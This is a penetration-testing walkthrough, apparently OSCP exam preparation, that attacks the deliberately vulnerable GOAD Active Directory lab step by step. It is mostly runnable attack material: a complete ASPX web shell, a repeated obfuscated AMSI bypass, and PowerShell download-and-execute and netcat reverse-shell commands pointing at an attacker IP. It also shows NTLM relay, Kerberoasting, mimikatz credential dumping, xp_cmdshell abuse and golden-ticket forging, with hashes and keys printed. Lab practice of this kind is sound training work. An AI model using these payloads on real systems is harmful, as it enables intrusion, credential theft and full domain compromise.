lOMoARcPSD|53406130

AD-IN-GOAD - For OSCP exam

Informatique (Université d'Aix-Marseille)

Scan to open on Studocu

Studocu is not sponsored or endorsed by any college or university

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)
 lOMoARcPSD|53406130

PENETRATION TESTING
ACTIVE DIRECTORY IN
GOAD PART I

By Hernan Rodriguez

Senior Offensive Cybersecurity | Red Teamer | eCPTXv2 | CRTO | CRTP | CRTA | eCPPTv2 |
eWPTXv2 | eWPT | CAPen | MCRTA | CMPen | eMAPT | CNPen | eJPT | CEH-P | C)PTE |
OWASP | MITRE | OSINT | Splunk | ISO27K

https://www.linkedin.com/in/hernanrodriguez-/

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

Table of Contents
PENETRATION TESTING ACTIVE DIRECTORY IN GOAD PART I...................................... .1
INSTALLATION....................................................................................................................... .3
ENUMERATION........................................................................................................................5
Authenticated SMB.....................................................................................................................6
SMB NULL Session....................................................................................................................9
NTLM RELAY........................................................................................................................ .14
RESPONDER AND NTLMRELAYX.PY (LOCAL ADMIN DUMPING LOCAL SAM
HASHES)............................................................................................................................ .15
REVERSE TCP RESPONDER AND NTLMRELAYX.PY............................................... .16
SOCKS NTLMRELAYX.PY (LOCAL ADMIN DUMPING LOCAL SAM HASHES)....16
ASREPROAST........................................................................................................................ .19
KERBEROASTING................................................................................................................ .21
UNCONSTRAINED DELEGATION.......................................................................................24
CONSTRAINED DELEGATION........................................................................................... .28
WEB SERVICES..................................................................................................................... .30
EXPLOITING TRUST RELATIONSHIPS............................................................................. .38
SID History Injection.......................................................................................................... .38
Kerberos Golden Ticket........................................................................................................43
ADCS (ACTIVE DIRECTORY CERTIFICATE SERVICES).................................................47

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

INSTALLATION

git clone https://github.com/Orange-Cyberdefense/GOAD.git cd GOAD

python3 -m venv venvGOAD source venvGOAD/bin/activate sudo apt install vagrant
pip install ansible-core
python3 -m pip install ansible-core python3 -m pip install pywinrm
cd ansible
ansible-galaxy install -r requirements.yml

Postdata: If you have little space on your main hard drive, we change the path where the hard
drives are stored in Virtualbox.

In the Vagrantfile file we add the following 2 final lines

config.vm.provider "virtualbox" do |vb|

vb.customize ["setextradata", :id, "VBoxInternal/Devices/VMMDev/0/Config/
GetHostTimeDisabled", "1"]
vb.customize ["modifyvm", :id, "--hddfolder", "/media/hernan/7EF2B0B94BF957E6/Virtualbox/"]

cd ..
check -l GOAD -p virtualbox -m local

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

./goad.sh -t install -l GOAD -p virtualbox -m local

We start the machines.

cd ad/GOAD/providers/virtualbox
vagrant up

We add the domains in the file sudo nano /etc/hosts

We add the DNS server in the sudo nano /etc/resolv.conf file

We verify connectivity with the devices.

crackmapexec smb 192.168.56.1/24

If we want to turn off the machine we can use in ad/GOAD/providers/virtualbox

vagrant halt

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

ENUMERATION
In this scenario we are going to identify the services available on devices in the 192.168.56.0/24
range.
nmap -p- -sC -sV -oA full_goad 192.168.56.10-12,22-23 -Pn -vvv

We verify the devices are SMB enabled.

crackmapexec smb 192.168.56.1/24

Enumerating users using brute force

git clone https://github.com/ropnop/kerbrute.git
cd kerbrute
sudo make all
ls dist/
./kerbrute_linux_amd64
sudo cp kerbrute /usr/bin
kerbrute userenum -d north.sevenkingdoms.local --dc 192.168.56.11 usuarios.txt -o valid_users.txt

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

Authenticated SMB

We verify the devices that have a description in the users.

crackmapexec ldap 192.168.56.11-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local -
M get-desc-users

We verify devices if they have an ADCS certificate.

crackmapexec ldap 192.168.56.11-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local -
M adcs

We check the allowed devices with their domain groups.

crackmapexec smb 192.168.56.11-23 -u samwell.tarly -p 'Heartsbane' --groups

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

We verify allowed devices with their local groups.

crackmapexec smb 192.168.56.11-23 -u samwell.tarly -p 'Heartsbane' --local-groups

Verificamos de manera autenticada los recursos compartidos en los dispositivos:

crackmapexec smb 192.168.56.11-23 -u samwell.tarly -p 'Heartsbane' --shares

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

Extract AD information
bloodhound-python -d north.sevenkingdoms.local -u samwell.tarly -p Heartsbane -dc
winterfell.north.sevenkingdoms.local -ns 192.168.56.11 --zip -c All
bloodhound-python -d essos.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -
dc meereen.essos.local -ns 192.168.56.12 --zip -c All
bloodhound-python -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p
iseedeadpeople -dc kingslanding.sevenkingdoms.local -ns 192.168.56.10 --zip -c All (error dns es
raro)
.\sharphound.exe -d sevenkingdoms.local -c all --zipfilename sevenkingdoms.zip

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

It helps a lot ;)
xfreerdp /v:192.168.56.11 /u:robb.stark /p:sexywolfy /size:80% /drive:tool,/tmp
wmic useraccount get domain,name,sid

SMB NULL Session

Is one vulnerability allows an attacker to access shared resources on a Windows network without
authentication, which may result in unauthorized access, information collection and remote code
execution. It should be disabled to prevent unwanted access.

Method 1

We verify access without authentication on the DC.

crackmapexec smb 192.168.56.1/24 --pass-pol

We verify the password policies, at this stage we identify that after 5 attempts with an incorrect
password due to the policy, the account is blocked for 5 minutes.

We list the users available on the DC.

crackmapexec smb 192.168.56.1/24 --users

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

We identified this security breach in the domain: north.sevenkingdoms.local

Additionally in the comments, we identify the password of the user north.sevenkingdoms.local\
samwell.tarly (Password: Heartsbane)

Method 2

We enter anonymously through RPC

rpcclient -U "" -N WINTERFELL
getdompwinfo
enumdomusers

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

queryuser 0x45f

We identify the user samwell.tarly and subsequently list his record by finding credentials in the
description.

We list the groups

enumdomgroups

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

Filtering users by enum4linux

enum4linux -U 192.168.56.11 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

Other methods
https://github.com/ropnop/windapsearch
python3 windapsearch.py --dc-ip 192.168.56.11 -u "" -U
ldapsearch -H ldap://192.168.56.11 -x -b "DC=north,DC=sevenkingdoms,DC=local" -s sub
"(objectclass=user)" | grep sAMAccountName: | cut -f2 -d" "
We check if the user whose password we had in their profile description can authenticate on
the other devices (DC) of the different domains.

crackmapexec smb 192.168.56.1/24 -u samwell.tarly -p 'Heartsbane'

We have access to the domains north.sevenkingdoms.local and essos.local with the following
devices WINTERFELL, CASTELBLACK, BRAAVOS

We extract the information of the director of the “WINTERFELL” domain with bloodhound-
python

pip install bloodhound

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

bloodhound-python -u samwell.tarly -p 'Heartsbane' -ns 192.168.56.11 -d

north.sevenkingdoms.local -c All

In which we identified 1 domain, 2 domains in the forest, 14 users, 51 groups, 3 gops, 19

containers, 1 trusts, castelblack.north.sevenkingdoms.local winterfell.north.sevenkingdoms.local
We import the files into bloodhound.

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

NTLM RELAY
Is an attack technique that takes advantage of the NTLM (NT LAN Manager) protocol used in
Windows network environments.

In this attack, an attacker intercepts and forwards a user's NTLM authentication credentials to a
remote server to gain unauthorized access to network resources.
This vulnerability allows attackers to gain improper access to sensitive systems and data on the
network.

responder -I vboxnet0

We waited a few minutes and got a Net-NTLMV2 hash from user eddard.stark
Password Cracking

Method 1
john --format=netntlmv2 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Method 2
hashcat -m 5600 --force -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

RESPONDER AND NTLMRELAYX.PY (LOCAL ADMIN DUMPING LOCAL SAM

HASHES)
cme smb 192.168.56.10-23 --gen-relay-list relay.txt
sudo nano /usr/share/responder/Responder.conf (edit smb off and http off)
sudo responder -I vboxnet0

impacket-ntlmrelayx -tf relay.txt -smb2support

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

REVERSE TCP RESPONDER AND NTLMRELAYX.PY

sudo responder -I vboxnet0

python3 -m http.server 8080
impacket-ntlmrelayx -tf relay.txt -smb2support -c "powershell IEX(New-Object
Net.WebClient).downloadString('http://192.168.100.150:8080/rshell.ps1')"

rlwrap nc -lvp 4444

SOCKS NTLMRELAYX.PY (LOCAL ADMIN DUMPING LOCAL SAM HASHES)

sudo responder -I vboxnet0
sudo impacket-ntlmrelayx -tf relay.txt -of netntlm -smb2support -socks
sudo nano /etc/proxychains4.conf (socks5 127.0.0.1 1080)
proxychains4 impacket-secretsdump -no-pass 'NORTH'/'ROBB.STARK'@'192.168.56.22'

From that point we have impersonalized the ROBB.STARK user ticket from the socks proxy, we
can use proxychains to authenticate directly without a password.
proxychains4 impacket-secretsdump -no-pass 'NORTH'/'ROBB.STARK'@'192.168.56.22'

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

python3 -m pip install lsassy

proxychains4 lsassy --no-pass -d NORTH -u EDDARD.STARK -d NORTH /home/hernan/ip.txt

git clone https://github.com/login-securite/DonPAPI.git

cd DonPAPI
poetry update
poetry install
poetry run DonPAPI
proxychains4 -q poetry run DonPAPI -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

Likewise, we can connect remotely to RCP or SMB services to obtain a shell.

proxychains4 impacket-smbclient -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug

proxychains4 impacket-smbexec -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

ASREPROAST
It is an attack that exploits weaknesses in the Windows Kerberos protocol to obtain passwords for
user accounts without needing to know them previously.

Once these tickets are obtained, the attacker can attempt to decrypt the passwords of these accounts
using offline brute force methods.

Unauthenticated attack
impacket-GetNPUsers north.sevenkingdoms.local/ -usersfile valid_users.txt -request -dc-ip
192.168.56.11 -request -format john -outputfile outputfile.txt

Authenticated attack
impacket-GetNPUsers north.sevenkingdoms.local/samwell.tarly:Heartsbane -request -dc-ip
192.168.56.11 -request -format john -outputfile outputfile.txt

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

In both scenarios, the Kerberos key was generated with the file name outputfile.txt.
We did a Password Cracking with john the ripper.

john --format:krb5asrep outputfile.txt --wordlist=/usr/share/seclists/Passwords/xato-net-10-million-

passwords-100000.txt

user brandon.stark's password is iseedeadpeople

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

KERBEROASTING

It is an attack on Active Directory environments that exploits weaknesses in the Microsoft Windows
Kerberos authentication protocol.

In this attack, an attacker can request service tickets for user accounts that have the authentication
service attribute disabled.

These tickets can be captured and later used to perform offline brute force attacks to crack the
passwords for these accounts.

This attack can compromise privileged user accounts and provide unauthorized access to systems
and resources on the network.

impacket-GetUserSPNs -request -dc-ip 192.168.56.11

north.sevenkingdoms.local/samwell.tarly:Heartsbane -outputfile hash.kerberos

It is used to request the Service Principal Names (SPNs) associated with a specific user on a domain
controller (DC), and we extract its kerberos hash.

Password Cracking
We perform a password cracking with hashcat.
hashcat -m 13100 hash.kerberos /usr/share/wordlists/rockyou.txt

john --format=krb5tgs hash.kerberos --wordlist=/usr/share/wordlists/rockyou.txt

We perform a password cracking with John the Ripper.

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

We verify which domain the user sansa.stark can authenticate on.

crackmapexec smb 192.168.56.10-23 -u sansa.stark -p iknownothing

Used to request a Ticket-Granting Ticket (TGT) for a specific user on a given domain.
impacket-getTGT north.sevenkingdoms.local/samwell.tarly:Heartsbane -dc-ip 192.168.56.11
export KRB5CCNAME=samwell.tarly.ccache
impacket-smbclient -k @winterfell.north.sevenkingdoms.local -dc-ip 192.168.56.11

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

Additional
If we are in a Windows RDP or from a reverse shell we can enumerate and exploit vulnerable
kerbeoasting accounts.

The script performs a search in the Active Directory to find all active user accounts, excluding the
krbtgt account and disabled accounts

([adsisearcher]'(&(samAccountType=805306368)(!samAccountName=krbtgt)(!
(UserAccountControl:1.2.840.113556.1.4.803:=2)))').FindAll()

./Rubeus.exe kerberoast /user:sql_svc

This command runs Rubeus, a security tool, with the "kerberoast" function, which is used to request
and steal service password hashes using the Kerberoasting attack. The user "sql_svc" is specified as
the target.

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

UNCONSTRAINED DELEGATION
Is a setting that attackers can potentially use to impersonate a user or service account and gain
access to sensitive resources on an organization's network.

findDelegation.py NORTH.SEVENKINGDOMS.LOCAL/robb.stark:sexywolfy -dc-host

WINTERFELL.north.sevenkingdoms.local

xfreerdp /v:192.168.56.11 /u:vagrant /p:vagrant /size:90% /drive:tool,/tmp

We identify on the server why the vulnerability occurs?

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

We connect remotely through WINRM

evil-winrm -u robb.stark -p 'sexywolfy' -i 192.168.56.11
Bypass AMSI:
[ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -
f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -
f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -
eq 1))
IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.150/PowerView.ps1')
iwr http://192.168.100.150/Ghostpack-CompiledBinaries/Rubeus.exe -o Rubeus.exe
./Rubeus.exe triage

Get-ADUser robb.stark -Properties MemberOf

Set-MpPreference -EnableRealTimeMonitoring $true (We are members of the local administrators

group, we disabled the Windows Defender)
./Rubeus.exe triage

We identify the available tickets.

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

python3 Coercer.py coerce -u robb.stark -d north.sevenkingdoms.local -p sexywolfy -t

kingslanding.sevenkingdoms.local -l winterfell
Try to take advantage of this configuration to gain access to resources on the "winterfell" DC using
delegated credentials.

./Rubeus.exe triage

./Rubeus.exe dump /user:KINGSLANDING /service:krbtgt /nowrap

cat tgt.b64 | base64 -d > ticket.kirbi

ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/workspace/unconstrained/ticket.ccache

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

secretsdump.py -k -no-pass
SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

evil-winrm -u administrator -H 'c66d72021a2d4744409969a581a1705e' -i

SEVENKINGDOMS.LOCAL

We are domain administrators.

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

CONSTRAINED DELEGATION

In Active Directory it refers to situations where the credential delegation configuration is not
properly secured.
This could allow an attacker to compromise a service or server and use it to gain unauthorized
access to other resources within the network, unwantedly escalating their privileges.

MATCH p=(u)-[:AllowedToDelegate]->(c) RETURN p

findDelegation.py NORTH.SEVENKINGDOMS.LOCAL/jon.snow:iknownothing -dc-host

WINTERFELL.north.sevenkingdoms.local

xfreerdp /v:192.168.56.11 /u:vagrant /p:vagrant /size:90% /drive:tool,/tmp

We identify on the server why the vulnerability occurs?

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

getST.py -spn 'CIFS/winterfell' -impersonate Administrator -dc-ip '192.168.56.11'

'north.sevenkingdoms.local/jon.snow:iknownothing'

export KRB5CCNAME=Administrator.ccache
wmiexec.py -k -no-pass 'north.sevenkingdoms.local/Administrator@winterfell'

secretsdump.py -k -no-pass 'north.sevenkingdoms.local/Administrator@winterfell'

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

WEB SERVICES
One of the initial vectors of a commitment in an Active Directory are the public resources of the
organization.

nmap -Pn -p- -sC -sV 192.168.56.22 -vvv -Pn

Ports Found:
80/tcp
135/tcp
139/tcp
445/tcp
3389/tcp
49672/tcp
49671/tcp
5986/tcp
49676/tcp
49666/tcp
49664/tcp
47001/tcp
50617/tcp
49675/tcp
49665/tcp
1433/tcp
5985/tcp
49670/tcp

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

Identified website that allows file uploads publicly, the server is an IIS ASPX .NET.
http://192.168.56.22/Default.aspx

We upload a file with an aspx backdoor extension.

file:shell.aspx

<%@ Page Language="C#" Debug="false" Trace="false" %>

<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e)
{
string cmd = Request.QueryString["cmd"];
if (!string.IsNullOrEmpty(cmd))
{
string output = ExecuteCmd(cmd);
OutputResult(output);
}
}
protected string ExecuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c " + arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
using (Process p = Process.Start(psi))
{
using (StreamReader stmrdr = p.StandardOutput)
{
string result = stmrdr.ReadToEnd();
return result;
}
}
}
protected void OutputResult(string result)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(result));
Response.Write("</pre>");
}
</script>

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

If the file was uploaded correctly, it is saved in the upload path, we execute a command using the
GET cmd parameter.

http://192.168.56.22/upload/shell.aspx?cmd=whoami

We create a malicious server with our backdoor in powershell

https://github.com/HernanRodriguez1/RevershellTCP_BypassAMSI
wget https://raw.githubusercontent.com/HernanRodriguez1/RevershellTCP_BypassAMSI/main/
rshell.ps1
We edit the rshell.ps1 file and add our IP and listening port.
$servidor = new-object System.Net.Sockets.TcpClient('192.168.100.150',443);
python3 -m http.server 80
nc -lvp 443
We start the nc server with interactive shell
rlwrap nc -lvp 443
We enter the payload in the vulnerable parameter of the affected server.
powershell.exe -exec Bypass -noexit -C "IEX (New-Object
Net.WebClient).DownloadString('http://192.168.100.150/rshell.ps1')"
http://192.168.56.22/upload/shell.aspx?cmd=powershell.exe%20-exec%20Bypass%20-noexit%20-
C%20%22IEX%20(New-Object%20Net.WebClient).DownloadString(%27http://192.168.100.150/
rshell.ps1%27)%22

We have our C2 on the castelblack host

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

Privilege Escalation

whoami /priv

We have the SeImpersonatePrivilege token enabled

We are going to impersonalize the system user with printspoofer.

cd C:\tmp
iwr http://192.168.100.150/nc.exe -O nc.exe
./nc.exe 192.168.100.150 445 -e powershell.exe

iwr http://192.168.100.150/PrintSpoofer.exe -O PrintSpoofer.exe

./PrintSpoofer.exe -i -c cmd.exe

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

Dump LSASS witch Mimikatz

cd C:\tmp
iwr http://192.168.100.150/mimikatz.exe -O mimikatz.exe
mimikatz.exe
privilege::debug
lsadump::sam /domain:north.sevenkingdoms.local /all /csv

user: Administrator
hash: dbd13e1c4e338284ac4e9874f7de6ef4

crackmapexec winrm 192.168.56.22 -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' -d

castelblack

evil-winrm -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' -i 192.168.56.22

whoami ; hostname

whoami /groups

We identify that the user is a Domain Administrator in NOTH.

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

sekurlsa::logonpasswords

user: robb.stark
pass: 831486ac7f26860c9e2f51ac91e1a07a

We verify which group the user robb.stark is in

We identify which devices the robb.stark user can connect to by executing commands.

crackmapexec smb 192.168.56.1/24 -u robb.stark -H '831486ac7f26860c9e2f51ac91e1a07a' -X

"whoami"

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

Linked Database Servers

The Linked Database Servers vulnerability occurs when database servers are insecurely
interconnected, allowing a vulnerability in one to compromise the security of the others.

We identify the hosts that allow authentication through MSSQL.

crackmapexec mssql 192.168.56.1/24 -u jon.snow -H 'b8d76e56e9dac90539aff05e3ccb1755'

Identificamos el usuario jon.snow, nos conectamos por el modulo de impacket mssqlclient.py.

/usr/share/doc/python3-impacket/examples/mssqlclient.py jon.snow@192.168.56.22 -hashes
':b8d76e56e9dac90539aff05e3ccb1755' -windows-auth
We identify the linked services.
enum_links

We have the BRAAVOS service, which is in the domain essos.local

We performed a force poisoning attack with smbserver and the xp_dirtree module to force the
remote server braavos.essos.local to enter my malicious smb server and capture the hash.

impacket-smbserver share . -smb2support

select * from openquery("BRAAVOS", 'SELECT 1; EXEC master..xp_dirtree ''\\192.168.100.150\
share\''')

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

In this scenario we capture the hash of the sql_svc user.

We enable xp_cmdshell on the remote BRAAVOS machine.

EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure

''xp_cmdshell'', 1; RECONFIGURE;') AT [BRAAVOS]
EXEC ('EXEC xp_cmdshell ''whoami''') AT [BRAAVOS]

We identify the permissions of the sql_svc user.

EXEC ('EXEC xp_cmdshell ''whoami /priv''') AT [BRAAVOS]

We identify the SeImpersonatePrivilege token, this allows us to impersonalize that account as an

NT AUTHORITY\SYSTEM system user.
To do this, first I am going to download ncat.exe and PrintSpoofer.exe (loader.exe)

EXEC ('EXEC xp_cmdshell ''powershell.exe copy \\192.168.100.150\\share\\Nct.exe c:\tmp\

Nct.exe''') AT [BRAAVOS]
EXEC ('EXEC xp_cmdshell ''powershell.exe copy \\192.168.100.150\\share\\Loader.exe c:\tmp\
Loader.exe''') AT [BRAAVOS]
rlwrap nc -lvp 443
EXEC ('EXEC xp_cmdshell ''c:\tmp\Loader.exe -c "c:\tmp\ncat.exe 192.168.100.150 443 -e
cmd.exe"''') AT [BRAAVOS]

We have access as a system user NT AUTHORITY\SYSTEM.

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

EXPLOITING TRUST RELATIONSHIPS

Exploiting trust relationships involves leveraging connections between systems to compromise the
security of a network, allowing attackers to move laterally and gain access to sensitive resources.

SID History Injection

The focus of the SID History Injection Attack is to facilitate the migration of users between
domains by ensuring continued access to resources from the previous domain. This is achieved by
incorporating the user's previous Security Identifier (SID) into the SID History of their new
account. Importantly, this process can be manipulated to grant unauthorized access by adding the
SID of a high-privilege group (such as Enterprise Administrators or Domain Administrators) of the
primary domain to the SID History. This exploit grants access to all resources within the parent
domain.

evil-winrm -u robb.stark -p 'sexywolfy' -i 192.168.56.11

Bypass AMSI:
[ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -
f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -
f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -
eq 1))
IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.150/PowerView.ps1')

Get-ADTrust -Filter *
Used to list trusted trusts established in an Active Directory environment.

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

Get-ADForest
It is used to collect information about the Active Directory forest such as forest name, domain root,
domain controllers, replication settings, functionality modes, and more.

Get-DomainTrust -Filter *
Se utiliza para enumerar y mostrar información sobre las relaciones de confianza establecidas entre
dominios en un entorno de Active Directory

SourceName : north.sevenkingdoms.local
TargetName : sevenkingdoms.local
Get-DomainSID -Domain north.sevenkingdoms.local
Get the DomainSID of the domain.

S-1-5-21-1783999085-2058125239-2142067885
Get-DomainSID -Domain sevenkingdoms.local
DomainSID of the parent domain.

Unknown error.
IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.150/ADMap.ps1')
DomainSID of the parent domain.

Unknown error.

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.150/ADMap.ps1')

DomainSID of the parent domain.

S-1-5-21-656936499-3686200758-3068599609

Allows users to obtain clear text passwords, password hashes, and other sensitive data stored in the
SAM (Security Account Manager) database and the NTDS.dit (Active Directory) database.

impacket-secretsdump 'north/robb.stark:sexywolfy@192.168.56.11

krbtgt nt_hash: 3f669715abb8fb5cada5f208d458e218

krbtgt aes256: 2718ee194cdce1bbeebb9f20cf5af8b4156b1465451bc4a7bd5c6ad281261da5

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

We check if we have arrival.

dir \\KINGSLANDING.sevenkingdoms.local\C$

We do not have access.

\mimi64.exe
token::elevate
privilege::debug
kerberos::golden /user:Administrator /domain:north.sevenkingdoms.local /sid:S-1-5-21-
1783999085-2058125239-2142067885 /sids:S-1-5-21-656936499-3686200758-3068599609-519
/aes256:2718ee194cdce1bbeebb9f20cf5af8b4156b1465451bc4a7bd5c6ad281261da5 /startoffset:-
5 /endin:600 /renew:10080 /ptt

kerberos::golden: Indicates that a Golden Ticket attack is being performed using Kerberos
functionality.
/user:Administrator: Specifies the username for which the Kerberos ticket is to be generated. In this
case, a ticket is being generated for the "Administrator" user.
/domain:north.sevenkingdoms.local: Specifies the domain for which the Kerberos ticket is to be
generated. Here, the domain "north.sevenkingdoms.local" is indicated.
/sid:S-1-5-21-1783999085-2058125239-2142067885: Provides the security identifier (SID) of the
domain. Each domain has a unique SID and this information is used in generating the Kerberos
ticket.
/sids:S-1-5-21-656936499-3686200758-3068599609-519: Specifies the additional SIDs to include
in the Kerberos ticket. These SIDs can represent security groups or other elements within the
domain.
/aes256:2718ee194cdce1bbeebb9f20cf5af8b4156b1465451bc4a7bd5c6ad281261da5: Provides the
AES256 key used to encrypt the Kerberos ticket. This key is necessary to generate a valid and
authenticated ticket.
/startoffset:-5: Specifies the start time in minutes for the Kerberos ticket. In this case, a start is set
five minutes in the past.
/endin:600: Indicates the duration of the Kerberos ticket in minutes. Here, it is established that the
ticket will be valid for the next 600 minutes (10 hours).
/renew:10080: Specifies the Kerberos ticket renewal time in minutes. In this case, it is established
that the ticket can be renewed every 10,080 minutes (one week).
/ptt: Indicates that the generated Kerberos ticket will be injected directly into the system for use.
This parameter allows the attacker to authenticate and access resources using the forged ticket.

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

klist
We list the tickets in session, we have impersonalized the administrator user of the domain
sevenkingdoms.local

dir \\KINGSLANDING.sevenkingdoms.local\C$
We list the DC folder, access is verified correctly.

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

iwr http://192.168.100.150/PsExec64.exe -O PsExec64.exe

.\PsExec64.exe -accepteula \\KINGSLANDING.sevenkingdoms.local powershell.exe
We enter the console powershell.exe del DC KINGSLANDING.sevenkingdoms.local

Kerberos Golden Ticket

In this attack, an attacker allows a Kerberos ticket ("Golden Ticket") to be generated. This forging
allows the attacker to authenticate as any user in the target domain without needing to know the
user's actual credentials.

Bypass AMSI:
[ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -
f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -
f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -
eq 1))
IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.150/PowerView.ps1')
Get-DomainSID -Domain north.sevenkingdoms.local

IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.150/ADMap.ps1')

Get-TrustRelationship

S-1-5-21-656936499-3686200758-3068599609
Get-DomainGroup -Domain sevenkingdoms.local -Identify "Enterprise Admins"

objectsid: S-1-5-21-656936499-3686200758-3068599609-519

Downloaded by phhhh lll (psnmhjp1f@relay.firefox.com)

 lOMoARcPSD|53406130

token::elevate
privilege::debug
lsadump::dcsync /domain:north.sevenkingdoms.local /all /csv

kerberos::golden /user:robb.stark /domain:north.sevenkingdoms.local /sid:S-1-5-21-2332039752-

785340267-2377082902 /sids:S-1-5-21-656936499-3686200758-3068599609-519
/krbtgt:3f669715abb8fb5cada5f208d458e218 /ticket:ticket.kirbi
